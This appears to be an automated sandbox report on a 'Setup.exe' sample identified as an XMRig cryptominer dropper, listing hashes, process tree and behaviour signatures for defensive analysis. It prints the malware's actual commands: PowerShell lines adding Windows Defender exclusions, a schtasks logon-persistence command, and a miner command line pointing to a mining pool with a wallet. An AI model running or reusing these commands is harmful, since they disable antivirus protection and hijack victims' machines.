Analysis
-
max time kernel
147s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-12-2024 17:21
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20240903-en
General
-
Target
Setup.exe
-
Size
29.8MB
-
MD5
f39a0615ad5482c3ffd8f46baeac3ac3
-
SHA1
e4cd77ab330f734e7a5253c07c559e8c92d88c35
-
SHA256
643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b
-
SHA512
fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481
-
SSDEEP
786432:PkvEnDem3vOYqVx9BvEiI8hXcclLOhiKw+HSD:svEn6mfN4xvcehFs7SD
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral2/memory/412-74-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/412-72-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/412-80-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/412-81-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/412-79-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/412-78-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/412-76-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/412-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3420 powershell.exe 2892 powershell.exe 4260 powershell.exe 3128 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2200 services64.exe 1840 sihost64.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File created C:\Windows\system32\services64.exe conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4828 set thread context of 412 4828 conhost.exe 109 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4724 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5068 conhost.exe 2892 powershell.exe 2892 powershell.exe 4260 powershell.exe 4260 powershell.exe 4828 conhost.exe 4828 conhost.exe 3128 powershell.exe 3128 powershell.exe 3420 powershell.exe 3420 powershell.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe 412 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 5068 conhost.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 4260 powershell.exe Token: SeDebugPrivilege 4828 conhost.exe Token: SeDebugPrivilege 3128 powershell.exe Token: SeDebugPrivilege 3420 powershell.exe Token: SeLockMemoryPrivilege 412 explorer.exe Token: SeLockMemoryPrivilege 412 explorer.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2712 wrote to memory of 5068 2712 Setup.exe 90 PID 2712 wrote to memory of 5068 2712 Setup.exe 90 PID 2712 wrote to memory of 5068 2712 Setup.exe 90 PID 5068 wrote to memory of 1404 5068 conhost.exe 91 PID 5068 wrote to memory of 1404 5068 conhost.exe 91 PID 1404 wrote to memory of 2892 1404 cmd.exe 93 PID 1404 wrote to memory of 2892 1404 cmd.exe 93 PID 5068 wrote to memory of 2840 5068 conhost.exe 94 PID 5068 wrote to memory of 2840 5068 conhost.exe 94 PID 2840 wrote to memory of 4724 2840 cmd.exe 96 PID 2840 wrote to memory of 4724 2840 cmd.exe 96 PID 1404 wrote to memory of 4260 1404 cmd.exe 97 PID 1404 wrote to memory of 4260 1404 cmd.exe 97 PID 5068 wrote to memory of 2036 5068 conhost.exe 98 PID 5068 wrote to memory of 2036 5068 conhost.exe 98 PID 2036 wrote to memory of 2200 2036 cmd.exe 100 PID 2036 wrote to memory of 2200 2036 cmd.exe 100 PID 2200 wrote to memory of 4828 2200 services64.exe 103 PID 2200 wrote to memory of 4828 2200 services64.exe 103 PID 2200 wrote to memory of 4828 2200 services64.exe 103 PID 4828 wrote to memory of 3612 4828 conhost.exe 104 PID 4828 wrote to memory of 3612 4828 conhost.exe 104 PID 3612 wrote to memory of 3128 3612 cmd.exe 106 PID 3612 wrote to memory of 3128 3612 cmd.exe 106 PID 3612 wrote to memory of 3420 3612 cmd.exe 107 PID 3612 wrote to memory of 3420 3612 cmd.exe 107 PID 4828 wrote to memory of 1840 4828 conhost.exe 108 PID 4828 wrote to memory of 1840 4828 conhost.exe 108 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 4828 wrote to memory of 412 4828 conhost.exe 109 PID 1840 wrote to memory of 1280 1840 sihost64.exe 110 PID 1840 wrote to memory of 1280 1840 sihost64.exe 110 PID 1840 wrote to memory of 1280 1840 sihost64.exe 110 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4724
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:1280
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=44uwibUE5EF8oiYGZWhDJ6YxTYoL8YgzyYw5ofRojJrtZydAndawV157eimKXonkgsi8ZNdvRq22xC6dmxwmq2tpQ4nTUDe --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
646B
MD523867f73ff39fa0dfee6cfb5d3d176ab
SHA18705a09d38e5f0b034a6f4b4deb5817e312204e1
SHA256f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88
SHA512108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD59a2c763c5ff40e18e49ad63c7c3b0088
SHA14b289ea34755323fa869da6ad6480d8d12385a36
SHA256517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e
SHA5123af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8
-
Filesize
944B
MD5a2c8179aaa149c0b9791b73ce44c04d1
SHA1703361b0d43ec7f669304e7c0ffbbfdeb1e484ff
SHA256c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a
SHA5122e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32KB
MD5554b19e8d2cd3728ec5557c08cd2151b
SHA17f22b80a8b3a141a93735f4423fda76f914dd92c
SHA25653b161d512a4cc0e7ad58be8bb5155e37399afe56cd7df38e9f0c4f09bb1cf56
SHA51246103c9ffb4483107ad0f5b91aba14464747a75a058d2610714f7155e0c014b094de0fb7f40d1515a008f70763131a4b7964d739a2e4381ac38a47755f6938a0
-
Filesize
29.8MB
MD5f39a0615ad5482c3ffd8f46baeac3ac3
SHA1e4cd77ab330f734e7a5253c07c559e8c92d88c35
SHA256643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b
SHA512fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481